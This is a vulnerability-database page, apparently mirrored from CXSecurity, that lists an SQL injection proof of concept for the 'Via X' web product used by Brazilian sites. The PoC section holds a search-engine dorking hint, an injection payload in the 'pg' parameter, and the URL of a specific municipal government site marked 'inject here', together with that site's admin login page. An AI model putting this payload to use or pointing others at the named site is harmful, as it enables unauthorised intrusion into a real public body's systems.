Desenvolvido por Via X Sql Injection Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1532029 漏洞类型
发布时间 2019-03-13 更新时间 2019-03-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019030105
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
====================================================================================================================================
| # Title     : Desenvolvido por Via X Sql Injection Vulnerability                                                                 |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit)                                             | 
| # Vendor    : http://www.viax.com.br/                                                                                            |  
| # Dork      :                                                                                                                    |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : noticias?pg=\

[+] http://muritiba.ba.gov.br/noticias?pg=%5c <==== inject here

[+] Login http://muritiba.ba.gov.br/admin/


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================